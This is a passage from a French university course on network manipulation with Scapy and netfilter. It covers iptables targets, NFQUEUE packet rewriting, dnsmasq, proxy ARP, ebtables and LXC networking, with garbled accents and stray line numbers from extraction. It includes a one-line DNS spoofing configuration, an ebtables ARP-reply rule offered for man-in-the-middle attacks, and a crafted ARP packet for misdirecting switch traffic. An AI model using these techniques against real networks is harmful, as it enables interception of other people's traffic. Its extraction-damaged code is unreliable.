-to-destination 192.168.1.1-192.168.1.10
2
# iptables -A FORWARD -p tcp -i eth0 -d 192.168.1.0/24 -dport 80 -j ACCEPT
Dans la ligne 1, la possibilit de donner une plage dadresse permet de laisser le firewall choisir une adresse au
hasard et faire ainsi une sorte dquilibre de charge.
La ligne 2 est ncessaire dans le cas o le firewall filtrerait tout et doit sappliquer sur les paquets aux adresses
rcrites.
Il est possible de rediriger le trafic vers la machine faisant tourner Scapy.
Scapy & NetFilter
69
REJECT : rejette le paquet comme DROP mais renvoi une erreur avec un paquet ICMP
-reject-with : avec une valeur parmi :
? icmp-net-unreachable
? icmp-proto-unreachable ? icmp-admin-prohibited
? icmp-host-unreachable
? icmp-net-prohibited
? tcp-reset
? icmp-port-unreachable
? icmp-host-prohibited
TTL : permet de modifier la valeur du champ de TTL :
-ttl-set : positionne la valeur ;
-ttl-dec et ttl-inc : incrmente la valeur du TTL.
1
iptables -t mangle -A PREROUTING -i eth0 -j TTL -ttl-inc 1
Ici, on annule le passage dans le routeur en r-incrmentant le TTL la sortie du paquet.

XOR : ralise un XOR du contenu TCP et UDP pour le dissimuler lanalyse
-key : donne la chane utiliser ;
-block-size : dfinie la taille du block
LOG : permet dobtenir une information sur les paquets.
1
iptables -t nat -I PREROUTING -p tcp -destination-port 80 -j LOG
Cette information peut tre consulte laide de la commande demsg :

[34985.564466] IN=eth0 OUT= MAC=00:0c:29:9d:ea:19:00:0c:29:22:ca:2f:08:00 SRC=192.168.127.128 DST=164.81.1.9

LEN=60 TOS=0x10 PREC=0x00 TTL=64 ID=28737 DF PROTO=TCP SPT=37925 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0
-log-prefix : permet dajouter un prfixe pour faciliter la recherche (avec la commande grep par
exemple)
1
# iptables -A INPUT -p tcp -j LOG -log-prefix "INPUT packets"
NFQueue : Combiner NetFilter et Scapy : aller plus loin

Il est possible daller plus loin et de permettre Scapy de recevoir lintgralit du paquet reu par le Firewall :
? on utilise le firewall pour rediriger les paquets slectionns :
$ sudo iptables -t filter -i bridge_dmz -A FORWARD -p tcp -sport 5001 -j NFQUEUE -queue-num 0
? Rcuprer le paquet dans Scapy et decider de son destin (set_verdict) :

1
#!/usr/bin/python
3
4
import nfqueue, socket

6
7
8
9
10
11
12
13
14
def traite_paquet(dummy, payload):

data = payload.get_data()
pkt = IP(data) # le paquet est fourni sous forme dune squence doctet, il faut limporter
# accepte le paquet : le paquet est remis dans la pile TCP/IP et poursuit sa route
#payload.set_verdict(nfqueue.NF_ACCEPT)
# si modifie : le paquet est remis MODIFIE dans la pile TCP/IP et poursuit sa route
#payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(pkt), len(pkt))
# si rejete : le paquet est rejet
#payload.set_verdict(nfqueue.NF_DROP)
16
17
18
19
20
21
q = nfqueue.queue()
q.open()
q.unbind(socket.AF_INET)
q.bind(socket.AF_INET)
q.set_callback(traite_paquet)
q.create_queue(0)
23
24
25
26
try:
q.try_run()
except KeyboardInterrupt, e:
print "interruption"
28
29
q.unbind(socket.AF_INET)
q.close()
70
NFQueue : contrle du dbit dune connexion TCP par la taille de la fentre
71
En utilisant la rgle suivante :

sudo iptables -t filter -i bridge_dmz -A FORWARD -p tcp -sport 5001 -j NFQUEUE -queue-num 0
On fait passer travers NFQUEUE les segments TCP en provenance de loutil iperf (outil permettant dvaluer
le dbit dune connexion TCP).
Avec Scapy, on modifie la taille des paquets lintrieur des segments pour la rendre infrieure une taille
choisie (note ici throughput ou dbit).
1
if pkt[TCP].window > throughput :
pkt[TCP].window = throughput
del pkt[TCP].chksum
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(pkt), len(pkt))
Ce qui donne pour une valeur de throughput = 250 :

pef@solaris:~$ sudo iptables -nvL
Chain FORWARD (policy ACCEPT 17320 packets, 815K bytes)
pkts bytes target
prot opt in
304K
tcp
16M NFQUEUE
out
source
bridge_dmz *
0.0.0.0/0
destination
0.0.0.0/0
root@INTERNAL_HOSTA:~/RESEAUX_I/FIREWALL# iperf -c 137.204.212.208
Client connecting to 137.204.212.208, TCP port 5001

TCP window size: 16.0 KByte (default)
3] local 137.204.212.11 port 45352 connected with 137.204.212.208 port 5001
[ ID] Interval
Transfer
Bandwidth
1.50 MBytes
1.20 Mbits/sec
3]
0.0-10.5 sec
tcp spt:5001 NFQUEUE num 0
NFQueue : contrle du dbit dune connexion TCP par la taille de la fentre

Pour une valeur de throughput = 1 000 :

[ ID] Interval
Transfer
Bandwidth
5.62 MBytes
4.65 Mbits/sec
3]
0.0-10.1 sec


[ ID] Interval
Transfer
Bandwidth
16.2 MBytes
13.6 Mbits/sec
3]
0.0-10.0 sec


[ ID] Interval
Transfer
Bandwidth
16.5 MBytes
13.8 Mbits/sec
3]
0.0-10.0 sec
72
20 Utilisation de dnsmasq
73
Dnsmasq est un serveur lger fournissant :

? un service de DHCP, o il est possible de :
configurer les options du DHCP connues dans la RFC 2132 ou dautres (si elles sont
reconnues par le client) ;
dtiqueter des machines suivant leur @MAC ou leur adresse IP prte pour ensuite
leur fournir des options choisies ;
? un service de DNS forwarder : il permet de fournir un service DNS sur un routeur permettant laccs Internet des postes depuis un rseau priv en ralisant du NAT :
il sert de serveur DNS, il fournit les entres DNS :
? qui lui sont fournies dans son fichier de configuration ;
? qui sont prsentes dans le fichier /etc/hosts de la machine hte ;
? qui sont associes aux adresses IP quil a fourni au travers du DHCP ;
quil a mmoris sur la machine hte, que ce soit des adresses symboliques (enregistrements A ou AAAA) ou des adresses inverses (enregistrement PTR).
fonctionnement de cache pour rduire le trafic en sortie ;
qui sont associes au serveur de courrier du domaine (enregistrement MX) ;
qui sont associes au services prsents dans le rseau (enregistrement SRV).
? un serveur TFTP, Trivial File Transfer Protocol , RFC 1350, 2347, 2348.
Utilisation de dnsmasq
Configuration
La configuration est ralise dans le fichier /etc/dnsmasq.conf :

1
expand-hosts
domain=test.net
dhcp-range=192.168.1.100,192.168.1.150,168h
dhcp-host=11:22:33:44:55:66,12:34:56:78:90:12,192.168.0.60
dhcp-host=11:22:33:44:55:66,set:red
dhcp-option = tag:red, option:ntp-server, 192.168.1.1
srv-host=_ldap._tcp.example.com,ldapserver.example.com,389
addn-hosts=/etc/banner_add_hosts
Description :
1. permet dtendre les noms de machines avec le nom de domaine indiqu ;
2. indique le nom de domaine ;
3. dfinit la plage dadresses fournies par le DHCP ainsi que le temps dassociation, ici 168h ;
4. associe une adresse donne une adresse MAC donne ;
5. tiquette une machine par son adresse MAC ;
6. dfinie une option fournir aux machines suivant une tiquette ;
7. dfinie un champ SRV ;
8. ajoute un fichier consulter pour de nouvelles associations @symbolique, @IP.
Le plus court fichier de config pour faire du spoofing
1
address=/www.google.nz/164.81.1.4
74
21 Le proxy ARP
75
Il correspond la possibilit dun hte, le plus souvent un routeur, de rpondre avec sa propre @MAC une requte
ARP destine un autre hte (RFC 925, 1027).
Il permet depuis un routeur de :
simuler la connexion directe dun hte, connect par une liaison point--point au routeur (dialup ou VPN) ;
relier deux segments de rseaux locaux o les machines connectes auront limpression dappartenir un mme et
seul rseau local.
Exemple dutilisation : cration dune DMZ
Soit le rseau 192.168.10.0/24, o lon voudrait crer une DMZ, mais sans faire de subnetting :
le serveur placer dans la DMZ est ladresse 192.168.10.1 ;
les machines peuvent utiliser les adresses restantes ;
un routeur GNU/Linux est insr entre le serveur et le reste du rseau.
Activation sur le routeur
Pour lactiver, il faut configurer une option du noyau GNU/Linux, en plus de la fonction de routage :
$ sudo sysctl -w net.ipv4.conf.all.forwarding=1
$ sudo sysctl -w net.ipv4.conf.eth0.proxy_arp=1
$ sudo sysctl -w net.ipv4.conf.eth1.proxy_arp=1
Il faudra lactiver sur linterface choisie, ici, eth0 et eth1.
Configuration du routeur
ses interfaces relis au serveur et au reste du rseau sont configures de la mme faon (@IP et prfixe) :
on configure les routes, une vers la partie rseau machine et lautre vers le serveur :
# ip route add 192.168.10.1 dev eth1
192.168.10.1 dev eth1
# ip route add 192.168.10.0/24 dev eth0
192.168.10.0/24 dev eth0
On peut vrifier les caches arp des machines.
scope link
scope link
22 Utilisation debtables
76
faire de la traduction dadresse, NAT , sur les adresses MAC, seulement pour des adresses qui existent sur des
interfaces diffrentes (si la trame est rcrite avec une adresse MAC destination qui est sur linterface do elle est
venue intialement, elle ne sera pas retransmise) :
# ebtables -t nat -A PREROUTING -d 00:11:22:33:44:55 -i eth0 -j DNAT
-to-destination 54:44:33:22:11:00
Ici, on utilise la table nat pour rcrire des adresses MAC dans les trames au passage dans le pont.
# ebtables -t nat -A POSTROUTING -s 00:11:22:33:44:55 -i eth0 -j SNAT -to-source 54:44:33:22:11:00
-snat-target ACCEPT
Ici, on change ladresse MAC source.

rpondre automatiquement des requtes arp :
# ebtables -t nat -A PREROUTING -p arp -arp-opcode Request -arp-ip-dst 192.168.127.2
-j ARPREPLY -arpreply-mac de:ad:be:ef:ca:fe
Ici, on peut rpondre automatiquement une requte ARP, par exemple en donnant une adresse MAC diffrente pour
une adresse IP connue et faire du MiTM. . .
23 LXC et interfaces rseaux

Il existe diffrents types dinterface pour la configuration dun container Linux :
phys : donne au container le contrle direct dune interface physique de lhte ;
veth : cre un couple dinterface :
une lintrieur du container (sur le
schma, lxcn0 ) ;
une dans lhte (sur le schma, veth0 )
qui doit tre relie un bridge (sur le
schma, br0 ).
Linterface externe permet dcouter
ce qui transite sur linterface interne du
container.
macvlan : il en existe de deux sortes :

1. vepa, ou virtual ethernet port aggregator : per-
met au container laccs au rseau au travers dun bridge Linux mais qui ne permet pas
lchange entre les containers eux-mmes ;
77
LXC et interfaces rseaux
78
macvlan : il en existe de deux sortes :

2. bridge : permet au container laccs direct au rseau et la communication entre les
containers mais qui les isolent de lhte ;
Pour les performances

Si on veut privilgier :
la communication container host : utilisation de la configuration veth ;

la communication container rseau : utilisation de la configuration macvlan avec laide dun routeur externe
pour dialoguer depuis lhte vers le container.

Cours Scapy

Încărcat de

Informații document

Drepturi de autor

Formate disponibile

Partajați acest document

Partajați sau inserați document

Opțiuni de partajare

Vi se pare util acest document?

Este necorespunzător acest conținut?

Drepturi de autor:

Formate disponibile

Cours Scapy

Încărcat de

Drepturi de autor:

Formate disponibile

Master 1 UE Rseaux Avancs II

Les Fourberies de Scapy

Les fourberies de Scapy

Table des matires

Introduction lanalyse de trafic rseau . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Les fourberies de Scapy

Les fourberies de Scapy

17.7 Ajout de protocole : retour sur les layers. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

1 Introduction lanalyse de trafic rseau

Les fourberies de Scapy

1.1 Les lments de lanalyse

Les lments sur lesquels on travaille sont :

. pour chacun de ces paquets, les champs qui les constituent :

Les fourberies de Scapy

1.2 De limportance des schmas ou pattern

Ces schmas dchange peuvent galement tre appels des signatures .

Les fourberies de Scapy

Trouver cette signature, cest :

1.3 La notion de signatures

La dtection de ces signatures, pattern matching , reposent sur :

? leur connaissance : connatre le schma dchange qui ralise lattaque ;

Les fourberies de Scapy

avec un trafic normal ;

1.4 Utilisation des signatures

Ces signatures peuvent tre dtermines sur lensemble des protocoles :

Les fourberies de Scapy

le CGI par exemple), NetBios, etc.

1.5 Les rsultats

Le rsultat de lanalyse peut conduire :

? la journalisation, log , de lattaque, avec ou non sauvegarde des paquets suspicieux ;

? la mise en place de contre-mesure : filtrage du trafic incrimin par reconfiguration du firewall,

Les fourberies de Scapy

Retour sur les types de connexion

Chapter 1 Introducing Network Analysis

Introducing Network Analysis Chapter 1

Les fourberies de Scapy

A switch is also used to connect computers together on a shared medium;

Mettre sur coute le rseau ?

Chapter 1 Introducing Network Analysis

Figure 1.6 Port Mirroring

On configure explicitement le switch pour dupliquer le trafic dun port

Les fourberies de Scapy

Mettre sur coute le rseau ?

dst=ff:ff:ff:ff:ff:ff src=02:02:02:02:02:02 type=0x806 |<ARP

hwtype=0x1 ptype=0x800 hwlen=6 plen=4 op=who-has

hwsrc=02:02:02:02:02:02 psrc=192.168.1.1 hwdst=ff:ff:ff:ff:ff:ff pdst=192.168.1.1

Il est possible de forcer le switch a renvoyer le trafic o il ne devrait pas :

Les fourberies de Scapy

. Port Spanning Reconfiguration on Switch : configurer le port mirroring .

Comment dtecter les sniffer ?

Les fourberies de Scapy

Layer 1: The Physical Layer Chapter 2

? Construire un cble uniquement en coute , le One-way cable :

? bloquer le protocole ARP sur son interface de sniffing :

Les fourberies de Scapy

link set dev eth1 arp off

2 Quest-ce que Scapy ?

des fonctions danalyse et de construction, des paquets rseaux partir de la couche 2

Les fourberies de Scapy

des fonctions dcoute, sniffing , du trafic rseau ;

3 Python & Scapy : cration de module ou de programme

Les fourberies de Scapy

3.1 Python & Scapy : utilisation du mode interactif

Les fourberies de Scapy

def init(self, name, age): # permet linitialisation de linstance

Help on function ma_fonction in module main: